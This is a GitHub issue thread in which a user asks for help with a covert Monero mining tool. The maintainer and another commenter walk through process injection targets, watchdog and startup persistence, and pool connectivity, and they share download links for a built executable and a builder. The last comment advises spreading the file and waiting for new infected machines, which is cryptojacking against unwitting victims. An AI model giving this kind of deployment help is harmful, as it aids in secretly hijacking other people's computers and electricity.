### ISSUE TITLE
Der Bergmann startet nicht. Was mache ich falsch?

### ISSUE THREAD

**Issue by zaratustra04** [UnamSanctam/SilentXMRMiner#114]
Screenshots der Programmeinstellungen:
1. http: //joxi.ru/n2YgWnBIe8kzPr
2. http: //joxi.ru/5mdgx0oI8oqzDr
3. http: //joxi.ru/L2168vlU0QwbzA
4. http: //joxi.ru/GrqjEzKtGWzP8m
5. http://joxi.ru/krDz384H4lGbR2

Was kann falsch sein?
Danke im Voraus für die Antwort.

**Comment by UnamSanctam** [comment]
Is it using any CPU? If it is then it has connected successfully and is mining, nanopool has a quite a high share difficulty so it can take a while for a share to be submitted.

**Comment by zaratustra04** [comment]
The wheel next to the cursor turns and stops. :)
And it was added to startup successfully, but it does not load the processor at all. - http://joxi.ru/Vm6ZMvzivP3okm

**Comment by UnamSanctam** [comment]
If you open CMD and run `ping xmr-eu1.nanopool.org` do you get any response?

**Comment by zaratustra04** [comment]
This is what it gives out - http://joxi.ru/ZrJz1N4HnGQXbr

**Comment by UnamSanctam** [comment]
Ok so the pool isn't blocked, if you download https://processhacker.sourceforge.io/ and search for explorer.exe can you find one that has a lot of text when you hover it?

**Comment by zaratustra04** [comment]
I hope I did everything right - http://joxi.ru/VrwEL3ns4MoN62

**Comment by UnamSanctam** [comment]
Yeah and it seems the miner isn't started, if you start the miner file does an new explorer.exe appear?

**Comment by zaratustra04** [comment]
After launch - http://joxi.ru/MAjENGJskqd6N2
Other processes - http://joxi.ru/v293E4Dipv40ar

**Comment by UnamSanctam** [comment]
Hmm, search for the process sihost64.exe and also check if the file exists in the install location, the regedit entry should point to where it is.

**Comment by zaratustra04** [comment]
Вы имеете введу найти расположение sihost64.exe?
http://joxi.ru/LmG9l84flXBQ3A
http://joxi.ru/ZrJz1N4HnGQajr

**Comment by zaratustra04** [comment]
Or do you have to enter the location of the miner itself?
http://joxi.ru/zANzNy4HjWwlJA

**Comment by UnamSanctam** [comment]
Hmm, there shouldn't be any reason for it not working since everything looks correct, can you try to build a new miner but change the "Inject into" to something else?

**Comment by oneinam1llion** [comment]
Try injecting into "cmd.exe" a universal proc that should be available on every windows installation. 
Your watchdog is clearly active and functioning, furthermore it seems you have a monero node running on that machine. Try turning off any other miners and combing through the network tab to make sure you do not have any current connections to the pool and try again.

**Comment by oneinam1llion** [comment]
Everything in those screenshots is correct, have you tried running this file on another machine or OS to verify it works?

**Comment by zaratustra04** [comment]
Today I will try to run it on another pc. I'll write it off right away.

**Comment by zaratustra04** [comment]
On the other pc, everything is the same. The processor is not loaded.

**Comment by zaratustra04** [comment]
I still haven't solved the problem :(
Can I leave here a link to the finished version of the miner?
Can you please check?

**Comment by zaratustra04** [comment]
The process is displayed in the manager. But it does not rise above 2-3%. The process is started, then interrupted, an endless cycle. I checked it on my second PC, however, there is also Windows 10.

**Comment by UnamSanctam** [comment]
Send the .exe here and I'll debug it and see if there is anything wrong. You can upload it to anonfiles and link it here if you want to.

**Comment by zaratustra04** [comment]
Thank you in advance for your cooperation!
For security reasons, I did not specify someone else's wallet.

https://anonfiles.com/U1E8x7lcu3/minertest_exe

**Comment by UnamSanctam** [comment]
All the code is correct, it starts correctly and begins mining for me. There should be something wrong with some component of your computer, have you tried restarting your computer once before running it?

**Comment by UnamSanctam** [comment]
You can also try building a miner using this: https://anonfiles.com/obPf37lcua/Silent_XMR_Miner_Builder_zip that version will display the console Windows so that you can see what goes wrong.

**Comment by oneinam1llion** [comment]
I use to be impatient when creating these files, sometimes they do not work on a certain machine, or certain windows update. Everyones configuration settings for their user profile is different. Some routers may block foreign ports such as 14433 etc, some people have firewalls etc etc. You cannot properly determine and prepare yourself for every outcome, simply spread your file and wait. If you see new miners after a day or so and you've got verified downloads. Then you're set, good things take time. Good things come to those who wait.
